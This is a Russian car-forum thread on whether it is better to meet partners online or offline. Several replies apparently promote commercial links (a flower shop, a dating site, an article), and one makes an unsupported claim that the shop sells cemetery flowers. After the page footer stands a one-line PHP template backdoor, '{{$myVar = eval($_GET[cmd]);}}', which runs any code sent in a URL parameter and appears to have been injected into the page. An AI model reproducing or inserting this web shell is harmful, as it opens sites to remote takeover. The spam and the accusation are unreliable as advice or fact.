+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Где лучше знакомится


  1. #1
    Мимо проходил Кузьмич is on a distinguished road Аватар для Кузьмич
    Регистрация
    30.11.2019
    Откуда
    Россия
    Машина
    Бричка
    Сообщений
    0

    Где лучше знакомится

    Как вы считаете, где сейчас лучше знакомится с противоположным полом - в интернете или в реале?

  2. #2
    Мимо проходил Trewes is on a distinguished road Аватар для Trewes
    Регистрация
    23.10.2015
    Откуда
    Москва
    Сообщений
    25
    Мне кажется, что это нужно делать по ситуации, так сложно сказать.

  3. #3
    Мимо проходил pavel444 is on a distinguished road Аватар для pavel444
    Регистрация
    30.05.2015
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    81
    Я со своей второй половинкой в интернете познакомился, а если быть точнее, то увидел девушку вконтакте, посмотрел её фотки. Она понравилась, вот и решил, что будет неплохо написать ей. В конце-концов, пообщались и договорились увидеться. К встречи я подготовился, заказал в магазине https://moskva.semicvetic.com/ для неё красивый букет цветов, вручил ей его на первом свидании. Она была приятно удивлено, что такое внимание к ней проявляю. Стали встречаться. В общем, вот уже как год вместе, готовимся к свадьбе.

  4. #4
    Мимо проходил Кузьмич is on a distinguished road Аватар для Кузьмич
    Регистрация
    30.11.2019
    Откуда
    Россия
    Машина
    Бричка
    Сообщений
    0
    Цитата Сообщение от pavel444 Посмотреть сообщение
    Я со своей второй половинкой в интернете познакомился, а если быть точнее, то увидел девушку вконтакте, посмотрел её фотки. Она понравилась, вот и решил, что будет неплохо написать ей. В конце-концов, пообщались и договорились увидеться. К встречи я подготовился, заказал в магазине для неё красивый букет цветов, вручил ей его на первом свидании. Она была приятно удивлено, что такое внимание к ней проявляю. Стали встречаться. В общем, вот уже как год вместе, готовимся к свадьбе.
    Да вы что?! У этих мошенников отродясь красивых букетов не бывает - они все свои цветы собирают на кладбищах, потом освежают химией и продают втридорога, так что ни в коем случае не советую с ними связываться!

  5. #5
    Мимо проходил Alistik is on a distinguished road Аватар для Alistik
    Регистрация
    02.12.2019
    Откуда
    Россия
    Сообщений
    0
    С одной стороны в реале знакомится лучше, а с другой - если человек не понравится то сложней будет от него избавится и придется сидеть и поддерживать какой-то нудный разговор, так что, на мой взгляд, тут больше подойдет вот такой сайт знакомств: https://linkyou.ru/ на котором можно будет подобрать себе партнера аналогичной профессии - так больше шансов, что вы найдете общий язык.

  6. #6
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    Я никогда не знакомился с девушками по интернету, ведь не все пишут о себе правду, да и фотографии не свои выкладывают. И о чем можно переписываться, когда не видишь человека в живую. В общем, такое знакомство и общение не для меня.

  7. #7
    Мимо проходил Larik is on a distinguished road Аватар для Larik
    Регистрация
    04.01.2019
    Откуда
    Россия.
    Машина
    Golf 4
    Сообщений
    65
    Мне кажется, что сейчас многие знакомятся по интернету, так как в основном все свободное время проводится за компьютером. Тем более что сейчас полно русских видеочатов для знакомств, кстати, на портале Школа Жизни, недавно вышла статья про эти видеочаты, если интересно, то здесь можете ознакомиться https://shkolazhizni.ru/market/articles/100027/ .

+ Ответить в теме

Похожие темы

  1. Привет! Давайте знакомится!
    от MegaPavel в разделе Welcome to GTI-CLUB
    Ответов: 23
    Последнее сообщение: 01.04.2024, 12:14
  2. Сайлентблоки, что лучше?!
    от Palma в разделе Golf 5
    Ответов: 14
    Последнее сообщение: 02.01.2024, 13:30
  3. Где лучше остановиться?
    от Миняев в разделе Курилка
    Ответов: 3
    Последнее сообщение: 05.12.2019, 12:32
  4. Давайте знакомится!
    от 3BEPb в разделе Курилка
    Ответов: 596
    Последнее сообщение: 24.02.2015, 16:41
  5. Чем лучше 9а чем КР???
    от TaPaKaH в разделе Курилка
    Ответов: 8
    Последнее сообщение: 09.08.2006, 17:20

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}